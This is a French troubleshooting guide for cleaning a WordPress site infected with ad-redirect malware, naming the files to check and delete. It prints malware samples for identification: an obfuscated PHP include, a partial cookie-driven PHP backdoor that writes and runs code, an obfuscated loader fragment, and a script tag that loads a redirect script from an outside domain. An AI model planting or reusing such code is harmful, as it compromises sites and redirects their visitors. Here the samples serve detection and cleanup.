Si vous avez un site wordpress qui redirige automatiquement vers des publicités en boucle lorsque vous rendez vous sur votre site.
Veuillez vérifier les points suivants ;
Table des matières
Ouvrez le fichier index.php
/*7b9b6*/
@include ("\057var\057www\057vho\163ts/\154esc\157ckt\141ils\144ale\170and\162e.c\157m/h\164tpd\157cs/\167p-i\156clu\144es/\142loc\153s/p\157st-\145xce\162pt/\05686c\063188\064.ic\157");
/*7b9b6*/
Si vous y voyez ce type de code alors, votre wordpress a été hacké. Ce type de code peut se trouver dans plusieurs fichiers.
Tous les fichiers index.php de votre site (voir les sous dossiers)
Le fichier wp-config.php
Vous avez vraisemblablement un fichier login.php qui a été complétement vérolé. Vous devez le supprimer.
radio.php
Vous aurez ce fichier infecté
function xk1($eg2){$ad3 = "i.cH2h35mpts*(fo70nk6Lva#u@I" .";81 e)4<g9bEy" ."/rl?d'" ."-F" ."_x" ;$ck5='';foreach($eg2 as $fb4){$ck5.=$ad3[$fb4];}return $ck5;}$wj6 = Array();$wj6[] = xk1(Array(7,7,17,45,37,16,23,16,47,4,29,30,6,47,34,17,16,38,47,29,32,30,2,47,4,37,17,37,2,14,20,45,45,38,2,7));$wj6[] = xk1(Array(44,9,5,9,31,26,25,18,43,0,18,19,13,49,49,48,27,21,39,49,49,33,28,31));$wj6[] = xk1(Array(1,8,15,45,25,43,32));$wj6[] = xk1(Array(3,12));$wj6[] = xk1(Array(1,41));$wj6[] = xk1(Array(24));$wj6[] = xk1(Array(35));$wj6[] = xk1(Array(14,0,43,32,49,9,25,10,49,2,15,18,10,32,18,10,11));$wj6[] = xk1(Array(23,42,42,23,40,49,8,32,42,36,32));$wj6[] = xk1(Array(11,10,42,49,42,32,9,32,23,10));$wj6[] = xk1(Array(32,50,9,43,15,45,32));$wj6[] = xk1(Array(11,25,38,11,10,42));$wj6[] = xk1(Array(25,18,43,0,18,19));$wj6[] = xk1(Array(11,10,42,43,32,18));$wj6[] = xk1(Array(9,23,2,19));$wj6[] = xk1(Array(8,45,7));foreach ($wj6[8]($_COOKIE, $_POST) as $wv14 => $sl11){function dx8($wj6, $wv14, $od10){return $wj6[11]($wj6[9]($wv14 . $wj6[0], ($od10 / $wj6[13]($wv14)) + 1), 0, $od10);}function jy7($wj6, $qk12){return @$wj6[14]($wj6[3], $qk12);}function kz9($wj6, $qk12){if (isset($qk12[2])) {$wo13 = $wj6[4] . $wj6[15]($wj6[0]) . $wj6[2];@$wj6[7]($wo13, $wj6[6] . $wj6[1] . $qk12[1]($qk12[2]));@include($wo13);@$wj6[12]($wo13);exit();}}$sl11 = jy7($wj6, $sl1
Voici le type de code qu’il contiendra.
Vous trouverez ce fichier dans cet emplacement wp-admin/css/colors/blue/ ou une autre couleur.
Supprimez le !
wp-stopstore.php
<?php $hpghqk = 'L1oFl/_5s-E2(nz@9vkg\'4Nxht3Uyi; ecfda6u<jr.0I7bm)p?'; $efsdqlj = array(); $efsdqlj[] = $hpghqk[21] . $hpghqk[32] . $hpghqk[34] . $hpghqk[37] . $hpgh
Fichier avec ce type de code également
Supprimez le également. Il se trouve à la racine de votre wordpress.
wp-clearlineee
Suprimmer le fichier que vous devez avoir à la racine.
Allez également à l’endroit où se trouve les extensions /wp-content/plugins/
et supprimer le dossier wp-clearlineee
L’extension insère dans votre page le javascript suivant
<script src=’https://news.weatherplllatform.com/counter.js‘ async=’true’ type=’text/javascript’></script> | |
Le javascript crée les redirections de vos visiteurs. Il vérifie d’abord si vous êtes l’administrateur du site. Si vous l’êtes vous n’êtes pas redirigé, oui le malware est malin. On veut pas que vous le détectez. Par contre si vous êtes un visiteur lambda alors vous êtes redirigez.
Au final
Votre wordpress n’est plus infecté.
Nous vous recommandons de mettre à jour votre thème ou de le changer. Le thème NewsMag ou Newspaper ont souvent des failles.
Si toutefois vous avez toujours un problème de wordpress piraté. N’hésitez pas à nous consulter.